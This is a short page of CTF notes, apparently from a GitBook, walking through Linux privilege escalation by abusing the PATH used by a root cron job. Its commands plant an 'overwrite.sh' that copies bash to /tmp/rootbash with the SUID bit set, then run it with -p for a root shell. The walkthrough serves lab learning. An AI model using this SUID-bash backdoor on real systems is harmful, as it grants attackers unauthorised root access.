> For the complete documentation index, see [llms.txt](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/linux-priv/cron-jobs/path-environment-abuse-2.md).

# PATH environment abuse 2

There is another way to escalate the privilege to root.

```
cat /etc/cron
```

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2FMAdaK0DY2ZVahG3brRAv%2Fimage.png?alt=media&amp;token=6944aac8-41e1-4a8e-864a-d9c06ed21cb7" alt=""><figcaption></figcaption></figure>

You can add an additional PATH environment and create a new 'overwrite.sh' to run.&#x20;

{% code overflow="wrap" %}

```bash
# Target machine 
echo -e '#!/bin/bash\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash' > /home/bla/overwrite.sh

export PATH=/home/bla:$PATH
```

{% endcode %}

Once the /tmp/rootbash file is created, execute it (with -p to preserve the effective UID) to gain a root shell.&#x20;

{% code overflow="wrap" %}

```bash
/tmp/rootbash –p
```

{% endcode %}
